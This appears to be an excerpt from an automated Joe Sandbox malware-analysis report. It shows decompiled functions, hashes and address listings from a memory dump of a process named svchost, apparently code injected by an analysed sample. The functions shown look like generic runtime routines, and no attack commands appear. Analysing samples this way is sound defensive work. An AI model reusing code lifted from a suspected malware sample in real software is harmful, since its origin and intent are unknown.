                                                                                                                                                                                                                                                    • API ID: _memsetcodecvt
                                                                                                                                                                                                                                                    • String ID: wwww
                                                                                                                                                                                                                                                    • API String ID: 2800761558-671953474
                                                                                                                                                                                                                                                    • Opcode ID: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                    • Instruction ID: 61b96e00e12962727ee7777b3b76a6d85f6ef15ab9ff8b766a9639ba92e0cd34
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b53e552e292a3f9917d3afa780c2f46f6f1ddef7a9f945bd37204f127812075
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88813C74E00318EFEB24CFA4D985BEDBBB5AF48318F108159E605BB2D0D775AA81CB54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                                                                    • String ID: cE
                                                                                                                                                                                                                                                    • API String ID: 2102423945-163553156
                                                                                                                                                                                                                                                    • Opcode ID: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                    • Instruction ID: fdc2fad14a78642c3e0d9cddc9ad9ddf1c8cf601b710c5b7852a6cc2ffa68677
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 943256848d02ca2258a44af5429b83fdcdd6a085740bad4c32c37f3083f003b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40718170E04238EAEF60CF91DA547BDB7F5AB01305F14819AE4897E1C4D7746A84DF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                    			E0400A7B7(signed char __edx) {
                                                                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                                                                    				signed char _t51;
                                                                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                                    				signed int* _t71;
                                                                                                                                                                                                                                                    				signed int* _t72;
                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                    				signed int _t83;
                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                                    				signed int _t98;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t89 = __edx;
                                                                                                                                                                                                                                                    				_t103 = __edx - 0x49;
                                                                                                                                                                                                                                                    				if(__edx == 0x49) {
                                                                                                                                                                                                                                                    					_t50 =  *_t71;
                                                                                                                                                                                                                                                    					__eflags = _t50 - 0x36;
                                                                                                                                                                                                                                                    					if(_t50 != 0x36) {
                                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                                    						__eflags = _t50 - 0x33;
                                                                                                                                                                                                                                                    						if(_t50 != 0x33) {
                                                                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                                                                    							__eflags = _t50 - 0x64;
                                                                                                                                                                                                                                                    							if(_t50 == 0x64) {
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t50 - 0x69;
                                                                                                                                                                                                                                                    							if(_t50 == 0x69) {
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t50 - 0x6f;
                                                                                                                                                                                                                                                    							if(_t50 == 0x6f) {
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t50 - 0x75;
                                                                                                                                                                                                                                                    							if(_t50 == 0x75) {
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t50 - 0x78;
                                                                                                                                                                                                                                                    							if(_t50 == 0x78) {
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t50 - 0x58;
                                                                                                                                                                                                                                                    							if(_t50 == 0x58) {
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							 *(_t98 - 0x26c) = _t93;
                                                                                                                                                                                                                                                    							 *(_t98 - 0x238) = _t93;
                                                                                                                                                                                                                                                    							_t64 = E0400ED68(_t89 & 0x000000ff, _t98 - 0x25c);
                                                                                                                                                                                                                                                    							__eflags = _t64;
                                                                                                                                                                                                                                                    							_t65 =  *(_t98 - 0x211);
                                                                                                                                                                                                                                                    							if(_t64 == 0) {
                                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                                    								E0400A462(_t65,  *((intOrPtr*)(_t98 - 0x24c)), _t98 - 0x228);
                                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t93 = _t98 - 0x228;
                                                                                                                                                                                                                                                    							E0400A462(_t65,  *((intOrPtr*)(_t98 - 0x24c)), _t98 - 0x228);
                                                                                                                                                                                                                                                    							_t65 =  *_t71;
                                                                                                                                                                                                                                                    							 *(_t98 - 0x23c) =  &(_t71[0]);
                                                                                                                                                                                                                                                    							__eflags =  *_t71;
                                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(E0400B23F(_t103))) = 0x16;
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_t70 = E0400B1D7(_t89, _t90, _t93);
                                                                                                                                                                                                                                                    								if( *((char*)(_t98 - 0x250)) != 0) {
                                                                                                                                                                                                                                                    									_t70 =  *(_t98 - 0x254);
                                                                                                                                                                                                                                                    									 *(_t70 + 0x70) =  *(_t70 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t52 = _t70 | 0xffffffff;
                                                                                                                                                                                                                                                    								goto L38;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						__eflags = _t71[0] - 0x32;
                                                                                                                                                                                                                                                    						if(_t71[0] != 0x32) {
                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *(_t98 - 0x210) =  *(_t98 - 0x210) & 0xffff7fff;
                                                                                                                                                                                                                                                    						 *(_t98 - 0x23c) =  &(_t71[0]);
                                                                                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					__eflags = _t71[0] - 0x34;
                                                                                                                                                                                                                                                    					if(_t71[0] != 0x34) {
                                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00008000;
                                                                                                                                                                                                                                                    					 *(_t98 - 0x23c) =  &(_t71[0]);
                                                                                                                                                                                                                                                    					goto L33;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					__eflags = __edx - 0x68;
                                                                                                                                                                                                                                                    					if(__edx == 0x68) {
                                                                                                                                                                                                                                                    						 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00000020;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						__eflags = __edx - 0x6c;
                                                                                                                                                                                                                                                    						if(__edx == 0x6c) {
                                                                                                                                                                                                                                                    							__eflags =  *_t74 - 0x6c;
                                                                                                                                                                                                                                                    							if( *_t74 != 0x6c) {
                                                                                                                                                                                                                                                    								 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00000010;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00001000;
                                                                                                                                                                                                                                                    								 *(_t98 - 0x23c) =  &(_t74[0]);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							__eflags = __edx - 0x77;
                                                                                                                                                                                                                                                    							if(__edx == 0x77) {
                                                                                                                                                                                                                                                    								 *(_t98 - 0x210) =  *(_t98 - 0x210) | 0x00000800;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                                                                    						_t72 =  *(_t98 - 0x23c);
                                                                                                                                                                                                                                                    						_t51 =  *_t72;
                                                                                                                                                                                                                                                    						 *(_t98 - 0x211) = _t51;
                                                                                                                                                                                                                                                    						__eflags = _t51;
                                                                                                                                                                                                                                                    						if(_t51 == 0) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t83 =  *(_t98 - 0x26c);
                                                                                                                                                                                                                                                    						_t89 = _t51;
                                                                                                                                                                                                                                                    						_t74 =  &(_t72[0]);
                                                                                                                                                                                                                                                    						__eflags =  *(_t98 - 0x228);
                                                                                                                                                                                                                                                    						 *(_t98 - 0x23c) =  &(_t72[0]);
                                                                                                                                                                                                                                                    						if( *(_t98 - 0x228) >= 0) {
                                                                                                                                                                                                                                                    							__eflags = _t89 - 0x20 - 0x58;
                                                                                                                                                                                                                                                    							if(_t89 - 0x20 > 0x58) {
                                                                                                                                                                                                                                                    								_t57 = 0;
                                                                                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t57 =  *(_t89 + 0x425950) & 0x0000000f;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t9 = _t57 * 8; // 0x3747193b
                                                                                                                                                                                                                                                    							_t59 =  *(_t83 + _t9 + 0x425970) >> 4;
                                                                                                                                                                                                                                                    							_t84 = 7;
                                                                                                                                                                                                                                                    							 *(_t98 - 0x26c) = _t59;
                                                                                                                                                                                                                                                    							__eflags = _t59 - _t84;
                                                                                                                                                                                                                                                    							if(_t59 > _t84) {
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto ( *((intOrPtr*)(0x407c80 + _t59 * 4)));
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					__eflags =  *((char*)(_t98 - 0x250));
                                                                                                                                                                                                                                                    					if( *((char*)(_t98 - 0x250)) != 0) {
                                                                                                                                                                                                                                                    						_t54 =  *(_t98 - 0x254);
                                                                                                                                                                                                                                                    						_t46 = _t54 + 0x70;
                                                                                                                                                                                                                                                    						 *_t46 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                    						__eflags =  *_t46;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t52 =  *(_t98 - 0x228);
                                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                                    					_pop(_t91);
                                                                                                                                                                                                                                                    					_pop(_t94);
                                                                                                                                                                                                                                                    					_pop(_t73);
                                                                                                                                                                                                                                                    					return E04006C8C(_t52, _t73,  *(_t98 - 4) ^ _t98, _t89, _t91, _t94);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                    0x0400a7b7
                                                                                                                                                                                                                                                    0x0400a7b7
                                                                                                                                                                                                                                                    0x0400a7ba
                                                                                                                                                                                                                                                    0x0400a811
                                                                                                                                                                                                                                                    0x0400a813
                                                                                                                                                                                                                                                    0x0400a815
                                                                                                                                                                                                                                                    0x0400a834
                                                                                                                                                                                                                                                    0x0400a834
                                                                                                                                                                                                                                                    0x0400a836
                                                                                                                                                                                                                                                    0x0400a855
                                                                                                                                                                                                                                                    0x0400a855
                                                                                                                                                                                                                                                    0x0400a857
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a85d
                                                                                                                                                                                                                                                    0x0400a85f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a865
                                                                                                                                                                                                                                                    0x0400a867
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a86d
                                                                                                                                                                                                                                                    0x0400a86f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a875
                                                                                                                                                                                                                                                    0x0400a877
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a87d
                                                                                                                                                                                                                                                    0x0400a87f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a885
                                                                                                                                                                                                                                                    0x0400a896
                                                                                                                                                                                                                                                    0x0400a89c
                                                                                                                                                                                                                                                    0x0400a8a2
                                                                                                                                                                                                                                                    0x0400a8a4
                                                                                                                                                                                                                                                    0x0400a8ab
                                                                                                                                                                                                                                                    0x0400a8cf
                                                                                                                                                                                                                                                    0x0400a8db
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a8db
                                                                                                                                                                                                                                                    0x0400a8b3
                                                                                                                                                                                                                                                    0x0400a8b9
                                                                                                                                                                                                                                                    0x0400a8be
                                                                                                                                                                                                                                                    0x0400a8c1
                                                                                                                                                                                                                                                    0x0400a8c7
                                                                                                                                                                                                                                                    0x0400a8c9
                                                                                                                                                                                                                                                    0x0400a578
                                                                                                                                                                                                                                                    0x0400a580
                                                                                                                                                                                                                                                    0x0400a581
                                                                                                                                                                                                                                                    0x0400a582
                                                                                                                                                                                                                                                    0x0400a583
                                                                                                                                                                                                                                                    0x0400a584
                                                                                                                                                                                                                                                    0x0400a585
                                                                                                                                                                                                                                                    0x0400a594
                                                                                                                                                                                                                                                    0x0400a596
                                                                                                                                                                                                                                                    0x0400a59c
                                                                                                                                                                                                                                                    0x0400a59c
                                                                                                                                                                                                                                                    0x0400a5a0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a5a0
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a8c9
                                                                                                                                                                                                                                                    0x0400a838
                                                                                                                                                                                                                                                    0x0400a83c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a840
                                                                                                                                                                                                                                                    0x0400a84a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a84a
                                                                                                                                                                                                                                                    0x0400a817
                                                                                                                                                                                                                                                    0x0400a81b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a81f
                                                                                                                                                                                                                                                    0x0400a829
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a7bc
                                                                                                                                                                                                                                                    0x0400a7bc
                                                                                                                                                                                                                                                    0x0400a7bf
                                                                                                                                                                                                                                                    0x0400a805
                                                                                                                                                                                                                                                    0x0400a7c1
                                                                                                                                                                                                                                                    0x0400a7c1
                                                                                                                                                                                                                                                    0x0400a7c4
                                                                                                                                                                                                                                                    0x0400a7de
                                                                                                                                                                                                                                                    0x0400a7e1
                                                                                                                                                                                                                                                    0x0400a7f9
                                                                                                                                                                                                                                                    0x0400a7e3
                                                                                                                                                                                                                                                    0x0400a7e4
                                                                                                                                                                                                                                                    0x0400a7ee
                                                                                                                                                                                                                                                    0x0400a7ee
                                                                                                                                                                                                                                                    0x0400a7c6
                                                                                                                                                                                                                                                    0x0400a7c6
                                                                                                                                                                                                                                                    0x0400a7c9
                                                                                                                                                                                                                                                    0x0400a7cf
                                                                                                                                                                                                                                                    0x0400a7cf
                                                                                                                                                                                                                                                    0x0400a7c9
                                                                                                                                                                                                                                                    0x0400a7c4
                                                                                                                                                                                                                                                    0x0400b032
                                                                                                                                                                                                                                                    0x0400b032
                                                                                                                                                                                                                                                    0x0400b032
                                                                                                                                                                                                                                                    0x0400b038
                                                                                                                                                                                                                                                    0x0400b03a
                                                                                                                                                                                                                                                    0x0400b040
                                                                                                                                                                                                                                                    0x0400b042
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400b044
                                                                                                                                                                                                                                                    0x0400b050
                                                                                                                                                                                                                                                    0x0400a638
                                                                                                                                                                                                                                                    0x0400a639
                                                                                                                                                                                                                                                    0x0400a640
                                                                                                                                                                                                                                                    0x0400a646
                                                                                                                                                                                                                                                    0x0400a650
                                                                                                                                                                                                                                                    0x0400a652
                                                                                                                                                                                                                                                    0x0400a667
                                                                                                                                                                                                                                                    0x0400a667
                                                                                                                                                                                                                                                    0x0400a654
                                                                                                                                                                                                                                                    0x0400a65e
                                                                                                                                                                                                                                                    0x0400a661
                                                                                                                                                                                                                                                    0x0400a669
                                                                                                                                                                                                                                                    0x0400a673
                                                                                                                                                                                                                                                    0x0400a676
                                                                                                                                                                                                                                                    0x0400a677
                                                                                                                                                                                                                                                    0x0400a67d
                                                                                                                                                                                                                                                    0x0400a67f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a685
                                                                                                                                                                                                                                                    0x0400a685
                                                                                                                                                                                                                                                    0x0400a685
                                                                                                                                                                                                                                                    0x0400a67f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400a646
                                                                                                                                                                                                                                                    0x0400b057
                                                                                                                                                                                                                                                    0x0400b05e
                                                                                                                                                                                                                                                    0x0400b060
                                                                                                                                                                                                                                                    0x0400b066
                                                                                                                                                                                                                                                    0x0400b066
                                                                                                                                                                                                                                                    0x0400b066
                                                                                                                                                                                                                                                    0x0400b066
                                                                                                                                                                                                                                                    0x0400b06a
                                                                                                                                                                                                                                                    0x0400b070
                                                                                                                                                                                                                                                    0x0400b073
                                                                                                                                                                                                                                                    0x0400b074
                                                                                                                                                                                                                                                    0x0400b077
                                                                                                                                                                                                                                                    0x0400b07e
                                                                                                                                                                                                                                                    0x0400b07e

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $2$l
                                                                                                                                                                                                                                                    • API String ID: 0-3132104027
                                                                                                                                                                                                                                                    • Opcode ID: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                                                                                    • Instruction ID: 97a9dc216c0970bdd76ba4c43342de9e9df9d78a676d099925bbab2bb04a16ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33ce8aebcf81edaf52939c3371d537490426ca7ff4ef4ab249f69b2ed4e8911d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD41DD30A862688AFF74CE64889C3F87BF5AB11359F4481CAC0A97A1C1C7757B86CF01
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                                                                                                                    			E04011930(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                                    				signed short _v40;
                                                                                                                                                                                                                                                    				signed short _v42;
                                                                                                                                                                                                                                                    				signed short _v44;
                                                                                                                                                                                                                                                    				signed short _v46;
                                                                                                                                                                                                                                                    				signed short _v50;
                                                                                                                                                                                                                                                    				signed short _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t56 = __ebx;
                                                                                                                                                                                                                                                    				_v8 =  *0x429024 ^ _t77;
                                                                                                                                                                                                                                                    				_v76 = __ecx;
                                                                                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                                                                                    				memcpy( &_v36, 0x427060, 6 << 2);
                                                                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                                                                    				_v64 = E04020CE0(0x29);
                                                                                                                                                                                                                                                    				_v60 = _v64;
                                                                                                                                                                                                                                                    				E04007010(0x42706c, _v60, 0, 0x29);
                                                                                                                                                                                                                                                    				 *0x425180( &_v52);
                                                                                                                                                                                                                                                    				 *0x4251f8(_v60, 0x28,  &_v36, _v52 & 0x0000ffff, _v50 & 0x0000ffff, _v46 & 0x0000ffff, _v44 & 0x0000ffff, _v42 & 0x0000ffff, _v40 & 0x0000ffff);
                                                                                                                                                                                                                                                    				_v68 = E04020CE0(8);
                                                                                                                                                                                                                                                    				if(_v68 == 0) {
                                                                                                                                                                                                                                                    					_v80 = 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v80 = E0401F4E0(_v68);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t72 = _v80;
                                                                                                                                                                                                                                                    				_v56 = _v80;
                                                                                                                                                                                                                                                    				E0401FC90(_t56, _v56, 0x42706c, 0x427060, _v60, E040070A0(_v60));
                                                                                                                                                                                                                                                    				if(_v60 != 0) {
                                                                                                                                                                                                                                                    					_t72 = _v60;
                                                                                                                                                                                                                                                    					_v72 = _v60;
                                                                                                                                                                                                                                                    					E04020CC0(_v72);
                                                                                                                                                                                                                                                    					_v60 = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return E04006C8C(_v56, _t56, _v8 ^ _t77, _t72, 0x42706c, 0x427060);
                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                    0x04011930
                                                                                                                                                                                                                                                    0x0401193d
                                                                                                                                                                                                                                                    0x04011942
                                                                                                                                                                                                                                                    0x04011945
                                                                                                                                                                                                                                                    0x04011959
                                                                                                                                                                                                                                                    0x0401195b
                                                                                                                                                                                                                                                    0x04011966
                                                                                                                                                                                                                                                    0x0401196c
                                                                                                                                                                                                                                                    0x04011977
                                                                                                                                                                                                                                                    0x04011983
                                                                                                                                                                                                                                                    0x040119b1
                                                                                                                                                                                                                                                    0x040119c4
                                                                                                                                                                                                                                                    0x040119cb
                                                                                                                                                                                                                                                    0x040119da
                                                                                                                                                                                                                                                    0x040119cd
                                                                                                                                                                                                                                                    0x040119d5
                                                                                                                                                                                                                                                    0x040119d5
                                                                                                                                                                                                                                                    0x040119e1
                                                                                                                                                                                                                                                    0x040119e4
                                                                                                                                                                                                                                                    0x040119fb
                                                                                                                                                                                                                                                    0x04011a04
                                                                                                                                                                                                                                                    0x04011a06
                                                                                                                                                                                                                                                    0x04011a09
                                                                                                                                                                                                                                                    0x04011a10
                                                                                                                                                                                                                                                    0x04011a18
                                                                                                                                                                                                                                                    0x04011a18
                                                                                                                                                                                                                                                    0x04011a31

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                    • String ID: `pB
                                                                                                                                                                                                                                                    • API String ID: 3713721629-8080248
                                                                                                                                                                                                                                                    • Opcode ID: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                    • Instruction ID: 23dbd6e54e78f367103934f2d22059264fab70093216257e69c110f1ce7c75f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e851101af669da2590ada226c12d76250e880d2472f87e89cdad929c21c02bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01313CB1D01218ABEB14EFD5E944AEEBBB5EF4C308F104029F505B7280E7756944CB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                    			E04005630(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                                                                                                    				E04007010(_t53, _v8, 0, 0x14);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x34)) = 0x77777777;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x14)) =  *0x4250c0(0, 1, 0, 0, __ecx);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x1c)) = 0;
                                                                                                                                                                                                                                                    				E04007010(_t53, _v8 + 0x20, 0, 8);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x28)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x2c)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x30)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x18)) = 0;
                                                                                                                                                                                                                                                    				E04007010(_t53, _v8 + 0x38, 0, 0x10);
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x48)) = 0x10;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x4c)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x50)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_v8 + 0x54)) = 0;
                                                                                                                                                                                                                                                    				 *((char*)(_v8 + 0x58)) = 0;
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x04005634
                                                                                                                                                                                                                                                    0x0400563f
                                                                                                                                                                                                                                                    0x0400564a
                                                                                                                                                                                                                                                    0x04005662
                                                                                                                                                                                                                                                    0x04005668
                                                                                                                                                                                                                                                    0x0400567a
                                                                                                                                                                                                                                                    0x04005685
                                                                                                                                                                                                                                                    0x0400568f
                                                                                                                                                                                                                                                    0x04005699
                                                                                                                                                                                                                                                    0x040056a3
                                                                                                                                                                                                                                                    0x040056b5
                                                                                                                                                                                                                                                    0x040056c0
                                                                                                                                                                                                                                                    0x040056ca
                                                                                                                                                                                                                                                    0x040056d4
                                                                                                                                                                                                                                                    0x040056de
                                                                                                                                                                                                                                                    0x040056e8
                                                                                                                                                                                                                                                    0x040056f2

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
